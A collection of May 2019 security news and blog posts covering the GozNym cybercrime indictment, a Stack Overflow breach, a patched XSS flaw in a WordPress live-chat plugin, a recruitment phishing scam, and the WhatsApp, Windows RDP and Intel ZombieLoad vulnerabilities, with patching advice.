Europol and US Police Disrupt $100m Cybercrime Gang

Europol and US authorities are claiming victory after “dismantling” a major international cybercrime gang that used the GozNym banking trojan in an attempt to steal $100m from businesses.

A federal indictment was unsealed yesterday charging 10 members of the group with conspiracy to commit computer fraud, conspiracy to commit wire fraud and bank fraud, and conspiracy to commit money laundering. An eleventh has already been charged in a previous indictment.

Five of the gang are based in Russia and will therefore probably escape justice. However, the leader of the group, Alexander Konovolov — aka “NoNe,” and “none_1” — 35, of Tbilisi, Georgia, is being prosecuted in his home country, along with his alleged right-hand man Marat Kazandjian, aka “phant0m,” 31, of Kazakhstan and Tbilisi.

Another man, Eduard Malanici, aka “JekaProf,” is being prosecuted in his native Moldova for charges relating to alleged provision of crypting services, while Gennady Kapkanov — aka “Hennadiy Kapkanov,” “flux,” “ffhost,” “firestarter,” and “User 41” — 36, of Poltava, Ukraine, is being prosecuted in the eastern European nation for charges of bulletproof hosting for the group via the infamous Avalanche network.

He was arrested in 2018 after shooting an assault rifle at Ukrainian police searching his flat, while another man, Krasimir Nikolov, of Varna, Bulgari, was extradited to the US in 2016 on charges of being the group’s account takeover specialist.

Each man had a specific role and was apparently recruited from Russian-speaking dark web forums. The GozNym malware was distributed to around 41,000 victim computers via phishing emails. Once they captured the victim’s online banking credentials, accounts were accessed and funds transferred to third-party accounts under the group’s control.

“International law enforcement has recognized that the only way to truly disrupt and defeat transnational, anonymized networks is to do so in partnership,” said Pennsylvania US attorney Scott Brady. 

“The collaborative and simultaneous prosecution of the members of the GozNym criminal conspiracy in four countries represents a paradigm shift in how we investigate and prosecute cybercrime.”

Roy Rashti, cybersecurity expert at BitDam, argued that the dismantling of this network is just a drop in the ocean, but a welcome move nonetheless.

“The ‘Goz’ in GozNym stands for the notorious Gozi banker malware which, although not new, was very successfully co-opted and iterated by hackers,” he added.

“This provides yet another example of how adversaries tweak known attacks to bypass legacy security solutions to reach and exploit the end user. This strategy allows cybercrime groups to operate like any successful business — with efficiency, dynamism and always staying one step ahead. That is of course, until they get caught.”

Stack Overflow Q&A platform announced a data breach

The popular question-and-answer platform for programmers Stack Overflow announced on Thursday that is has suffered a data breach.

The news of a data breach makes the headlines, this time the victim is the popular question-and-answer platform for programmers Stack Overflow.

The company announced on Thursday that it has discovered unauthorized access to its production systems over the weekend.

The company immediately launched an investigation. At this time the company did not share technical details about the intrusion, it only revealed that has found no evidence that customer or user data was compromised.

“Over the weekend, there was an attack on Stack Overflow. We have confirmed that some level of production access was gained on May 11.” reads a data breach notification published by Mary Ferguson, VP of Engineering at Stack Overflow. “We discovered and investigated the extent of the access and are addressing all known vulnerabilities,”

Stack Overflow has more than 10 million registered users and it has over 50 million unique visitors every month. The Q&A platform is the most important website of the Stack Exchange Network.

Stack Overflow data breach

In December 2018, another popular Q&A platform, Quora, revealed to have suffered a data breach.

Back in December, the popular Q&A website Quora revealed that has suffered a data breach.

Unknown hackers breached its systems and accessed 100 million user data, exposed data included names, email addresses and hashed password.

Pierluigi Paganini

(SecurityAffairs – data breach, hacking)

The post Stack Overflow Q&A platform announced a data breach appeared first on Security Affairs.

XSS flaw in WordPress Live Chat Plugin lets attackers compromise WP sites

A vulnerability in the Live Chat Support plugin for WordPress could be exploited by attackers to inject malicious scripts in websites using it

Researchers at Sucuri have discovered a stored/persistent cross-site scripting (XSS) vulnerability in the WP Live Chat Support plugin for WordPress.

The flaw could be exploited by remote, unauthenticated attackers to inject malicious scripts in websites running WordPress CMS and using
Live Chat Support plugin. The issue could be exploited by a remote attacker that does not have an account on the affected website.

It has been estimated that the plugin currently has over 60,000 installs, it implements a chat solution for customer engagement and conversion.

Versions of the plugin previous to 8.0.27 are vulnerable to stored/persistent XSS.

Experts pointed out that the attack to trigger this issue can be automated to hit a broad range of victims.

An XSS vulnerability could allow hackers to inject malicious code in websites and compromise visitors’ accounts or expose them to modified page content. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. 

An XSS is persistent when the malicious code is added to a section that is stored on the server. Every time the browser of a visitor loads the page, it parses the malicious code and executes the malicious code.

In order to exploit the vulnerability, it is possible to use an unprotected admin_init hook as attack vector:

Live Chat Support Plugin

Experts discovered that the function wplc_head_basic lack of proper privilege checks while updates the plugin settings.

Live Chat Support Plugin 2

“It then executes an action hook with even more critical settings ” reads the advisory published by Sucuri. ” Since “admin_init” hooks can be called visiting either /wp-admin/admin-post.php or /wp-admin/admin-ajax.php, an unauthenticated attacker could use these endpoints to arbitrarily update the option  “wplc_custom_js”. “

The content of the option is added to every page that loads the live chat support, allowing attackers to inject malicious JavaScript code on multiple pages.

To secure your WordPress install update the WP Live Chat Support pluign to version 8.0.27

Below the timeline of the flaw:

  • April 30, 2019: Initial contact attempt.
  • May 15, 2019: Patch is live.

Pierluigi Paganini

(SecurityAffairs – Live Chat Support, Hacking)


The post XSS flaw in WordPress Live Chat Plugin lets attackers compromise WP sites appeared first on Security Affairs.

Pharmaceutical companies exploited by phishing scam targeting job seekers

Earlier this month, two major pharmaceutical giants issued warnings about phishing emails targeting job hunters.

GlaxoSmithKline and AstraZeneca say they are victims of recruitment scams, in which crooks create fake job adverts to obtain people’s personal and financial details. The bogus ads can be hard to spot, because they use legitimate logos and material, and hide the scammers’ email addresses effectively.

How the scam works

Based on AstraZeneca and GlaxoSmithKline’s statements, this is a fairly standard case of recruitment fraud. Job seekers find the fake advert on a recruitment site and provide their CV, which will typically include the applicant’s name, email address, current employer and other personal details.

The scammers will then email the applicant to say they are being considered, before offering them a job. At this point, one of two things will happen.

The scammers might refer the victim to an employment agent (also fake), who will ask for money to complete registration fees. Alternatively, the victim might report directly to the HR department of the bogus employer.

Either way, the final step of the crooks’ plan is to ask for financial details to pay the employee’s salary into. They will instead use the details to steal money, before cutting all ties with the victim.

Why it’s so successful

Recruitment fraud seems like one of the more obvious scams to spot. How could anyone’s alarm not be raised if they are offered a job without an interview?

Unfortunately, red flags like that are ignored in all kinds of phishing scams, and this scheme is a perfect example of why that happens. Most of us know how disheartening it is to send off application after application knowing that you probably won’t ever hear anything back. It’s therefore completely understandable that curiosity and/or hope might get the better of you when you hear that you’re not only in consideration but have also been offered a job.

Sure, you’re likely to be a little suspicious, but it’s a highly respected organisation like GlaxoSmithKline or AstraZeneca, so it must be legitimate, right?

It’s only in retrospect that you see all the clues that should’ve confirmed your suspicions.

What should you be looking for?

GlaxoSmithKline says job hunters can determine the legitimacy of an advert by asking:

  • Are there major spelling or grammatical errors in the communication?
  • What is the sender’s email address? Does this seem consistent with previous communications?
  • Who is sending the email? Search the name online to determine whether it’s a real employee and whether they are the appropriate person to be managing the application process.

It adds that an advert posted by a third party isn’t necessarily fraudulent, but recommends that job hunters research the company to see if they represent the organisation.

It’s not the end of the world if you don’t spot a scam during the application process. The crooks will have your contact details and any other information on your CV, but at least they won’t have your financial details. Preventing that from happening is simple, provided you remain cautious.

AstraZeneca and GlaxoSmithKline remind job hunters that they never ask for money during the recruitment process (no legitimate organisation would). The latter adds that:

If you receive a genuine job offer of a job with us, whether the offer is made directly by us or through an agency, you will not be required to pay any money towards administration fees.

We also recommend that you do not disclose personal or financial details to anyone you do not know.

As is standard, GlaxoSmithKline says that interviewees or those who have been offered jobs might be asked to provide passport information or other personal identification, such as a National Insurance number.

If you receive and accept a job offer, you will obviously have to provide financial information; this will typically be at the same time as you sign your employee contract. However, you should only be asked for account information, which is used to deposit funds, rather than the card number, which is used to withdraw funds.

Can you spot a phishing scam?

The warnings issued by AstraZeneca and GlaxoSmithKline show just how big of a threat phishing poses. The methods for spotting and preventing it are the same no matter what form the scam takes, yet millions of people fall victim in both personal and work environments.

When it comes to recruitment scams, it’s up to individuals to protect their own data, but organisations have a lot more at stake. An employee who can’t spot a malicious email is liable to hand over vast amounts of sensitive information or expose the organisation to further threats. For example, most ransomware attacks are spread via phishing emails.

Organisations can tackle that threat with our Phishing and Ransomware – Human patch e-learning course.

This ten-minute course explains the basics of email-based threats, showing staff how to spot and avoid phishing scams and ransomware.

The post Pharmaceutical companies exploited by phishing scam targeting job seekers appeared first on IT Governance Blog.

WhatsApp, Microsoft and Intel Chip Vulnerabilities

Quickly applying software updates (patching) to mitigate security vulnerabilities is a cornerstone of both a home and business security strategy. So it was interesting to see how the mainstream news media reported the disclosure of three separate ‘major’ security vulnerabilities this week, within WhatsApp, Microsoft Windows and Intel Processors.

WhatsApp

The WhatsApp security flaw by far received the most the attention of the media and was very much the leading frontpage news story for a day. The WhatsApp vulnerability (CVE-2019-3568) impacts both iPhone and Android versions of the mobile messaging app, allowing an attacker to install surveillance software, namely, spyware called Pegasus, which access can the smartphone's call logs, text messages, and can covertly enable and record the camera and microphone.

From a technical perspective, the vulnerability (CVE-2019-3568) can be exploited with a buffer overflow attack against WhatsApp's VOIP stack, this makes remote code execution possible by sending specially crafted SRTCP packets to the phone, a sophisticated exploit.

Should you be concerned?

WhatsApp said it believed only a "select number of users were targeted through this vulnerability by an advanced cyber actor." According to the FT, that threat actor was an Israeli company called ‘NSO Group’. NSO developed the exploit to sell on, NSO advertises it sells products to government agencies "for fighting terrorism and aiding law enforcement investigations". NSO products (aka "spyware") is known to be used by government agencies in UAE, Saudi Arabia and Mexico.

So, if you are one of the 1.5 billion WhatsApp users, not a middle-east political activist or a Mexican criminal, you probably shouldn’t too worry about your smartphone being exploited in the past. If you were exploited, there would be signs, with unusual cliches and activity on your phone.  Despite the low risk at present, all WhatsApp users should quickly update their WhatsApp app before criminals attempt to ‘copycat’ NSO Group exploitation.

How to Prevent 

Update the WhatsApp app.
iOS

  • Open the Apple AppStore App
  • Search for WhatsApp Messenger
  • Tap 'Update' and the latest version of WhatsApp will be installed
  • App Version 2.19.51 and above fixes the vulnerability
Android
  • Open Google Play Store
  • Tap the menu in the top left corner
  • Go to “My Apps & Games”
  • Tap ‘Update’ next to WhatsApp Messenger and the latest version of WhatsApp will be installed
  • App Version 2.19.134 and above fixes the vulnerability
Microsoft Worm Vulnerability CVE-2019-0708
Making fewer media headlines was the announcement of a new “wormable” vulnerability discovered within the various versions of the Microsoft’s Windows operating system.  The vulnerability CVE-2019-0708 is within Window's “remote desktop services” component.

This vulnerability is by far the most dangerous vulnerability reported this week, probably this year, it is a similar flaw to what the WannaCry malware exploited on mass in May 2017. WannaCry was a ransomware worm which severely impacted the operation of several large organisations, including the NHS. It exploited a similar Microsoft Windows vulnerability which enabled the malware to quickly self-propagate (worm) across networks and infecting vulnerable systems on mass with ransomware, rendering such systems unusable.


Such is the concern of a second WannaCry style attack due to this flaw, Microsoft has taken the rare step of releasing security patches for their unsupported versions of the Windows operating system, such as Windows XP and Windows Server 2003. 

How to Prevent
Apply the latest Microsoft Windows Update. Microsoft has said anti-virus products will not provide any protection against the exploitation of this vulnerability, therefore applying the Microsoft May 2019 Security Update, as released on Tuesday 14th May 2019, is the only way to be certain of protecting against the exploitation of this critical vulnerability 

Ensure automatic updates is always kept switched on. Windows by default should attempt to download and install the latest security updates, typically you will be prompted to apply the update and accept a reboot, do this without delay. 

To double check, select the Start menu, followed by the gear cog icon on the left. Then, select Update & Security and Windows Update.

Businesses must also seek to apply Microsoft security updates as soon as they are released. Typically large organisations control the release of Microsoft security patches centrally, they should monitor and risk assess the importance of newly released security updates, and then apply across their IT estate at a rate based on risk.

Intel CPU ZombieLoad Vulnerability
There was little mainstream coverage about a third major security vulnerability reported this week. Coined 'ZombieLoad side-channel processor', this vulnerability is present in almost every Intel processor made since 2011. This hardware vulnerability is a concern to businesses which use or provide cloud services. This flaw can also be mitigated by patching, with Microsoft, Apple, Amazon and Google all releasing security patches. For further information about the Intel CPU vulnerability, read the following posts.

CVE-2019-0708 – A Critical “Wormable” Remote Code Execution Vulnerability in Windows RDP

This is an important security advisory related to a recently patched Critical remote code execution vulnerability in Microsoft Windows Remote Desktop Service (RDP). The vulnerability is identified as “CVE-2019-0708 – Remote Desktop Services Remote Code Execution Vulnerability”. MSRC blog mentions This vulnerability is pre-authentication and requires no user interaction. In other…